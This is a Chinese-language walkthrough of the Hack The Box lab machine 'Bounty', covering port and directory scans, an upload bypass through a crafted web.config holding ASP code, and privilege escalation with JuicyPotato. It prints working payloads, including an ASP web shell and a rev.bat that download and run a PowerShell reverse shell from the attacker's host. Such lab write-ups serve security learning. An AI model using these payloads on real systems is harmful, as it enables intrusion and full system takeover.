基本信息

端口扫描

只有80:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
$ nmap -sC -sV -Pn 10.10.10.93
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2021-04-29 15:08 CST
Nmap scan report for 10.10.10.93
Host is up (0.070s latency).
Not shown: 999 filtered ports
PORT   STATE SERVICE VERSION
80/tcp open  http    Microsoft IIS httpd 7.5
| http-methods:
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/7.5
|_http-title: Bounty
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 68.47 seconds

80

一张图:

目录扫描

因为是iis,所以指定asp和aspx,目录扫描结果:

1
2
3
4
5
➜  ~ gobuster dir -u http://10.10.10.93/ -w /usr/share/seclists/Discovery/Web-Content/common.txt  -x asp,aspx,html,txt -t 50

/aspnet_client        (Status: 301) [Size: 156] [--> http://10.10.10.93/aspnet_client/]
/transfer.aspx        (Status: 200) [Size: 941]
/uploadedfiles        (Status: 301) [Size: 156] [--> http://10.10.10.93/uploadedfiles/]

transfer.aspx

文件上传功能:

文件上传

正常的文件上传测试,没有重命名:

aspx

不能直接上传aspx,可以00截断:

但不能解析,继续测试发现可以上传config:

web.config

根据这篇文章,可以在web.config中加入asp代码:

上传访问,发现成功执行:

reverse shell

所以就可以直接asp加载powershell reverse shell:

1
2
3
4
<%@ Language=VBScript %>
<%
  call Server.CreateObject("WSCRIPT.SHELL").Run("cmd.exe /c powershell.exe -c iex(new-object net.webclient).downloadstring('http://10.10.14.10:7777/Invoke-PowerShellTcp.ps1')")
%>

user flag

merlin用户桌面隐藏文件,user.txt:

提权信息

systeminfo看一下然后内核提权,查看权限也能看到SeAssignPrimaryTokenPrivilege,可以juicypotato提权

  • ms10_092_schelevator
  • ms16_014_wmi_recv_notif
  • Juicy Potato
1
2
3
4
5
6
7
8
9
10
11
12
13
14
PS C:\temp> whoami /priv

PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                               State
============================= ========================================= ========
SeAssignPrimaryTokenPrivilege Replace a process level token             Disabled
SeIncreaseQuotaPrivilege      Adjust memory quotas for a process        Disabled
SeAuditPrivilege              Generate security audits                  Disabled
SeChangeNotifyPrivilege       Bypass traverse checking                  Enabled
SeImpersonatePrivilege        Impersonate a client after authentication Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set            Disabled
PS C:\temp>

Juicy Potato提权

juicy potato打到system:

1
2
3
4
5
6
7
8
9
 # smb传文件
 net use \\10.10.14.10\miao
 copy \\10.10.14.10\miao\JuicyPotato.exe .
 copy \\10.10.14.10\miao\rev.bat .
 
 # rev.bat
powershell.exe -c iex(new-object net.webclient).downloadstring('http://10.10.14.10:7777/Invoke-PowerShellTcp.ps1')

./JuicyPotato.exe -t * -p rev.bat -l 4444

root flag

administrator桌面,root.txt:

参考资料